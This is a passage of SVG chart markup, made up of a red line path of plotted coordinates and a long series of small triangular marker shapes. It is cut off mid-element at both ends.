146.01884191176472 234.90177568000001 L 147.546875 234.90177568000001 L 149.0749080882353 234.87327048533336 L 150.6029411764706 234.84748296533337 L 152.13097426470588 234.83289608533337 L 153.6590073529412 234.83289608533337 L 155.18704044117646 234.83289608533337 L 156.71507352941177 234.83289608533337 L 158.24310661764707 234.45226376533338 L 159.77113970588235 233.87524136533335 L 161.29917279411765 233.29889384533337 L 162.82720588235296 233.23478024533335 L 164.35523897058823 233.23478024533335 L 165.88327205882354 233.23478024533335 L 167.41130514705884 233.23478024533335 L 168.93933823529412 233.23478024533335 L 170.46737132352942 233.23478024533335 L 171.99540441176472 233.17052851200012 L 173.5234375 233.17052851200012 L 175.0514705882353 233.11686963200012 L 176.5795036764706 232.59602408533337 L 178.10753676470588 232.048308448 L 179.6355698529412 231.94601084800001 L 181.1636029411765 231.92968743466662 L 182.69163602941177 231.44984775466662 L 184.21966911764707 231.03952071466662 L 185.74770220588235 231.03952071466662 L 187.27573529411765 231.03952071466662 L 188.80376838235296 231.00927898666663 L 190.33180147058823 231.00927898666663 L 191.85983455882354 231.00927898666663 L 193.38786764705884 231.00927898666663 L 194.91590073529412 230.90534746666663 L 196.44393382352942 230.69815930666664 L 197.97196691176472 230.61042490666665 L 199.5 230.61042490666665 L 201.0280330882353 230.61042490666665 L 202.5560661764706 230.61042490666665 L 204.08409926470588 230.4201087466666 L 205.6121323529412 230.37084250666663 L 207.1401654411765 230.37084250666663 L 208.66819852941177 230.37084250666663 L 210.19623161764707 230.31809530666663 L 211.72426470588235 230.31809530666663 L 213.25229779411765 230.31809530666663 L 214.78033088235296 230.31809530666663 L 216.30836397058823 230.31809530666663 L 217.83639705882354 230.31809530666663 L 219.36443014705884 230.31809530666663 L 220.89246323529412 230.20066618666664 L 222.42049632352942 230.20066618666664 L 223.94852941176472 230.14532602666662 L 225.4765625 230.14532602666662 L 227.0045955882353 229.9705321066666 L 228.5326286764706 229.93614874666662 L 230.06066176470588 229.90590701866662 L 231.5886948529412 229.75047228799986 L 233.1167279411765 229.75047228799986 L 234.64476102941177 228.46820028799988 L 236.17279411764707 227.17917948799987 L 237.70082720588238 226.35042684799987 L 239.22886029411765 226.21914492799988 L 240.75689338235296 226.21914492799988 L 242.28492647058823 226.21914492799988 L 243.81295955882354 225.24461820799988 L 245.34099264705884 223.39544700799988 L 246.86902573529412 221.9943961279999 L 248.39705882352942 220.71212412799986 L 249.92509191176472 220.51051260799989 L 251.453125 220.38884239999987 L 252.9811580882353 219.13221583999987 L 254.5091911764706 218.02541263999987 L 256.0372242647059 217.83708559999985 L 257.56525735294116 217.72174505599986 L 259.09329044117646 217.66970115199987 L 260.62132352941177 217.62316205866648 L 262.1493566176471 217.5825271786665 L 263.6773897058824 217.44329667199986 L 265.2054227941177 216.9640213653331 L 266.7334558823529 216.00906616533314 L 268.26148897058823 214.76561752533314 L 269.78952205882354 213.1439519253331 L 271.31755514705884 209.03393272533313 L 272.84558823529414 207.46885048533312 L 274.37362132352945 203.62025848533312 L 275.9016544117647 201.9684048319994 L 277.4296875 197.99803843201124 L 278.9577205882353 197.99803843201124 L 280.4857536764706 197.99803843201124 L 282.0137867647059 197.99803843201124 L 283.54181985294116 197.99803843201124 L 285.06985294117646 197.99803843201124 L 286.59788602941177 197.89275715201123 L 288.1259191176471 197.34070531201124 L 289.6539522058824 197.26114051201125 L 291.1819852941177 196.26366787201124 L 292.7100183823529 195.36607747201123 L 294.23805147058823 194.29031875201122 L 295.76608455882354 194.17700995201125 L 297.29411764705884 194.02017494401122 L 298.82215073529414 193.00785494401123 L 300.35018382352945 191.79577046401124 L 301.8782169117647 190.39202006401123 L 303.40625 188.78310614401124 L 304.9342830882353 188.53212932267786 L 306.4623161764706 188.33379985067785 L 307.9903492647059 188.14489975467785 L 309.51838235294116 188.0599659093445 L 311.04641544117646 187.91201326934447 L 312.57444852941177 186.6015443093445 L 314.1024816176471 186.5115614933445 L 315.6305147058824 186.1637496533445 L 317.1585477941177 185.1481618133445 L 318.6865808823529 183.3273781973445 L 320.21461397058823 182.4770293973445 L 321.74264705882354 181.96479547734447 L 323.27068014705884 181.89024610134447 L 324.79871323529414 181.67988561067773 L 326.32674632352945 181.50274026667773 L 327.8547794117647 181.31774026667773 L 329.3828125 181.18816330667772 L 330.9108455882353 181.07478346667773 L 332.4388786764706 181.01226826667772 L 333.9669117647059 180.95459799467773 L 335.4949448529412 180.8502978560111 L 337.02297794117646 180.64255874134437 L 338.55101102941177 180.39420290134439 L 340.0790441176471 179.97801506134437 L 341.6070772058824 179.71616162134438 L 343.1351102941177 178.56076706134436 L 344.6631433823529 177.49280853334437 L 346.19117647058823 175.12447701334435 L 347.71920955882354 174.88842530134434 L 349.24724264705884 173.47440962134436 L 350.77527573529414 170.80998338134435 L 352.30330882352945 167.90284898134436 L 353.8313419117647 167.64909410134436 L 355.359375 167.64909410134436 L 356.8874080882353 167.64909410134436 L 358.4154411764706 167.64909410134436 L 359.9434742647059 167.64909410134436 L 361.4715073529412 167.5902256213444 L 362.99954044117646 166.93679970134434 L 364.52757352941177 166.84501602134435 L 366.0556066176471 166.75593186134435 L 367.5836397058824 166.67494626134436 L 369.1116727941177 166.62493410134434 L 370.6397058823529 166.59891214934436 L 372.16773897058823 166.50716398934438 L 373.69577205882354 166.44246075734438 L 375.22380514705884 166.33987899734436 L 376.75183823529414 165.61100859734435 L 378.27987132352945 165.33768219734438 L 379.8079044117647 164.66955099734437 L 381.3359375 164.00141979734437 L 382.8639705882353 163.32384027734437 L 384.3920036764706 163.01879451734436 L 385.9200367647059 162.72319707734437 L 387.4480698529412 161.62266118401112 L 388.97610294117646 160.5876083840111 L 390.50413602941177 160.5035645120111 L 392.0321691176471 160.5035645120111 L 393.5602022058824 160.5035645120111 L 395.0882352941177 160.5035645120111" fill="none" stroke="#DF5353" stroke-width="2"></path><path d="M 395 155.18 L 399 163.18 391 163.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 393.5 155.18 L 397.5 163.18 389.5 163.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 392 155.18 L 396 163.18 388 163.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 390.5 155.18 L 394.5 163.18 386.5 163.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 389 155.18 L 393 163.18 385 163.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 387.5 156.18 L 391.5 164.18 383.5 164.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 386 157.18 L 390 165.18 382 165.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 384.5 157.68 L 388.5 165.68 380.5 165.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 383 158.18 L 387 166.18 379 166.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 381.5 158.68 L 385.5 166.68 377.5 166.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 380 159.18 L 384 167.18 376 167.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 378.5 160.18 L 382.5 168.18 374.5 168.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 377 160.18 L 381 168.18 373 168.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 375 161.18 L 379 169.18 371 169.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 373.5 161.18 L 377.5 169.18 369.5 169.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 372 161.18 L 376 169.18 368 169.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 370.5 161.18 L 374.5 169.18 366.5 169.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 369 161.18 L 373 169.18 365 169.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 367.5 161.18 L 371.5 169.18 363.5 169.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 366 161.68 L 370 169.68 362 169.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 364.5 161.68 L 368.5 169.68 360.5 169.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 363 161.68 L 367 169.68 359 169.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 361.5 162.18 L 365.5 170.18 357.5 170.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 360 162.18 L 364 170.18 356 170.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 358.5 162.18 L 362.5 170.18 354.5 170.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 357 162.18 L 361 170.18 353 170.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 355.5 162.18 L 359.5 170.18 351.5 170.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 354 162.18 L 358 170.18 350 170.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 352.5 162.68 L 356.5 170.68 348.5 170.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 351 165.68 L 355 173.68 347 173.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 349 168.18 L 353 176.18 345 176.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 347.5 169.68 L 351.5 177.68 343.5 177.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 346 169.68 L 350 177.68 342 177.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 344.5 172.18 L 348.5 180.18 340.5 180.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 343 173.18 L 347 181.18 339 181.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 341.5 174.18 L 345.5 182.18 337.5 182.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 340 174.68 L 344 182.68 336 182.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 338.5 175.18 L 342.5 183.18 334.5 183.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 337 175.18 L 341 183.18 333 183.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 335.5 175.68 L 339.5 183.68 331.5 183.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 334 175.68 L 338 183.68 330 183.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 332.5 175.68 L 336.5 183.68 328.5 183.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 331 175.68 L 335 183.68 327 183.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 329.5 175.68 L 333.5 183.68 325.5 183.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 328 176.18 L 332 184.18 324 184.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 326.5 176.18 L 330.5 184.18 322.5 184.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 325 176.18 L 329 184.18 321 184.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 323.5 176.68 L 327.5 184.68 319.5 184.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 321.5 176.68 L 325.5 184.68 317.5 184.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 320 177.18 L 324 185.18 316 185.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 318.5 178.18 L 322.5 186.18 314.5 186.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 317 179.68 L 321 187.68 313 187.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 315.5 180.68 L 319.5 188.68 311.5 188.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 314 181.18 L 318 189.18 310 189.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 312.5 181.18 L 316.5 189.18 308.5 189.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 311 182.68 L 315 190.68 307 190.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 309.5 182.68 L 313.5 190.68 305.5 190.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 308 182.68 L 312 190.68 304 190.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 306.5 183.18 L 310.5 191.18 302.5 191.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 305 183.18 L 309 191.18 301 191.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 303.5 183.68 L 307.5 191.68 299.5 191.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 302 185.18 L 306 193.18 298 193.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 300.5 186.68 L 304.5 194.68 296.5 194.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 299 187.68 L 303 195.68 295 195.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 297.5 188.68 L 301.5 196.68 293.5 196.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 296 188.68 L 300 196.68 292 196.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 294 189.18 L 298 197.18 290 197.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 292.5 190.18 L 296.5 198.18 288.5 198.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 291 191.18 L 295 199.18 287 199.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 289.5 192.18 L 293.5 200.18 285.5 200.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 288 192.18 L 292 200.18 284 200.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 286.5 192.68 L 290.5 200.68 282.5 200.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 285 192.68 L 289 200.68 281 200.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 283.5 192.68 L 287.5 200.68 279.5 200.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 282 192.68 L 286 200.68 278 200.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 280.5 192.68 L 284.5 200.68 276.5 200.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 279 192.68 L 283 200.68 275 200.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 277.5 192.68 L 281.5 200.68 273.5 200.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 276 196.68 L 280 204.68 272 204.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 274.5 198.18 L 278.5 206.18 270.5 206.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 273 202.18 L 277 210.18 269 210.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 271.5 203.68 L 275.5 211.68 267.5 211.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 270 207.68 L 274 215.68 266 215.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 268.5 209.68 L 272.5 217.68 264.5 217.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 266.5 210.68 L 270.5 218.68 262.5 218.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 265 211.68 L 269 219.68 261 219.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 263.5 212.18 L 267.5 220.18 259.5 220.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 262 212.18 L 266 220.18 258 220.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 260.5 212.18 L 264.5 220.18 256.5 220.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 259 212.18 L 263 220.18 255 220.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 257.5 212.18 L 261.5 220.18 253.5 220.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 256 212.68 L 260 220.68 252 220.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 254.5 212.68 L 258.5 220.68 250.5 220.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 253 213.68 L 257 221.68 249 221.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 251.5 215.18 L 255.5 223.18 247.5 223.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 250 215.18 L 254 223.18 246 223.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 248.5 215.18 L 252.5 223.18 244.5 223.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 247 216.68 L 251 224.68 243 224.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 245.5 218.18 L 249.5 226.18 241.5 226.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 244 219.68 L 248 227.68 240 227.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 242.5 220.68 L 246.5 228.68 238.5 228.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 241 220.68 L 245 228.68 237 228.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 239 220.68 L 243 228.68 235 228.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 237.5 221.18 L 241.5 229.18 233.5 229.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 236 221.68 L 240 229.68 232 229.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 234.5 223.18 L 238.5 231.18 230.5 231.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 233 224.68 L 237 232.68 229 232.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 231.5 224.68 L 235.5 232.68 227.5 232.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 230 224.68 L 234 232.68 226 232.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 228.5 224.68 L 232.5 232.68 224.5 232.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 227 224.68 L 231 232.68 223 232.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 225.5 224.68 L 229.5 232.68 221.5 232.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 224 224.68 L 228 232.68 220 232.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 222.5 224.68 L 226.5 232.68 218.5 232.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 221 224.68 L 225 232.68 217 232.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 219.5 225.18 L 223.5 233.18 215.5 233.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 218 225.18 L 222 233.18 214 233.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 216.5 225.18 L 220.5 233.18 212.5 233.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 215 225.18 L 219 233.18 211 233.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 213.5 225.18 L 217.5 233.18 209.5 233.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 211.5 225.18 L 215.5 233.18 207.5 233.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 210 225.18 L 214 233.18 206 233.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 208.5 225.18 L 212.5 233.18 204.5 233.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 207 225.18 L 211 233.18 203 233.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 205.5 225.18 L 209.5 233.18 201.5 233.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 204 225.18 L 208 233.18 200 233.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 202.5 225.18 L 206.5 233.18 198.5 233.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 201 225.18 L 205 233.18 197 233.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 199.5 225.18 L 203.5 233.18 195.5 233.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 198 225.18 L 202 233.18 194 233.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 196.5 225.18 L 200.5 233.18 192.5 233.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 195 225.68 L 199 233.68 191 233.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 193.5 225.68 L 197.5 233.68 189.5 233.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 192 225.68 L 196 233.68 188 233.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 190.5 225.68 L 194.5 233.68 186.5 233.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 189 225.68 L 193 233.68 185 233.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 187.5 225.68 L 191.5 233.68 183.5 233.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 185.5 225.68 L 189.5 233.68 181.5 233.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 184 225.68 L 188 233.68 180 233.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 182.5 226.18 L 186.5 234.18 178.5 234.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 181 226.68 L 185 234.68 177 234.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 179.5 226.68 L 183.5 234.68 175.5 234.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 178 226.68 L 182 234.68 174 234.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 176.5 227.18 L 180.5 235.18 172.5 235.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 175 227.68 L 179 235.68 171 235.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 173.5 227.68 L 177.5 235.68 169.5 235.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 172 227.68 L 176 235.68 168 235.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 170.5 227.68 L 174.5 235.68 166.5 235.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 169 227.68 L 173 235.68 165 235.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 167.5 227.68 L 171.5 235.68 163.5 235.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 166 227.68 L 170 235.68 162 235.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 164.5 227.68 L 168.5 235.68 160.5 235.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 163 227.68 L 167 235.68 159 235.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 161.5 228.18 L 165.5 236.18 157.5 236.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 160 228.68 L 164 236.68 156 236.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 158 229.18 L 162 237.18 154 237.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 156.5 229.68 L 160.5 237.68 152.5 237.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 155 229.68 L 159 237.68 151 237.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 153.5 229.68 L 157.5 237.68 149.5 237.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 152 229.68 L 156 237.68 148 237.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 150.5 229.68 L 154.5 237.68 146.5 237.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 149 229.68 L 153 237.68 145 237.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 147.5 229.68 L 151.5 237.68 143.5 237.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 146 229.68 L 150 237.68 142 237.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 144.5 229.68 L 148.5 237.68 140.5 237.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 143 229.68 L 147 237.68 139 237.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 141.5 229.68 L 145.5 237.68 137.5 237.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 140 230.18 L 144 238.18 136 238.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 138.5 231.18 L 142.5 239.18 134.5 239.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 137 231.18 L 141 239.18 133 239.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 135.5 231.18 L 139.5 239.18 131.5 239.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 134 231.18 L 138 239.18 130 239.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 132.5 231.18 L 136.5 239.18 128.5 239.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 130.5 231.18 L 134.5 239.18 126.5 239.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 129 231.18 L 133 239.18 125 239.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 127.5 231.18 L 131.5 239.18 123.5 239.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 126 231.18 L 130 239.18 122 239.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 124.5 231.68 L 128.5 239.68 120.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 123 231.68 L 127 239.68 119 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 121.5 231.68 L 125.5 239.68 117.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 120 231.68 L 124 239.68 116 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 118.5 231.68 L 122.5 239.68 114.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 117 231.68 L 121 239.68 113 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 115.5 231.68 L 119.5 239.68 111.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 114 231.68 L 118 239.68 110 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 112.5 231.68 L 116.5 239.68 108.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 111 231.68 L 115 239.68 107 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 109.5 231.68 L 113.5 239.68 105.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 108 231.68 L 112 239.68 104 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 106.5 231.68 L 110.5 239.68 102.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 105 231.68 L 109 239.68 101 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 103 231.68 L 107 239.68 99 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 101.5 231.68 L 105.5 239.68 97.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 100 231.68 L 104 239.68 96 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 98.5 231.68 L 102.5 239.68 94.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 97 231.68 L 101 239.68 93 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 95.5 231.68 L 99.5 239.68 91.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 94 231.68 L 98 239.68 90 239.68 Z" fill="#DF5353" 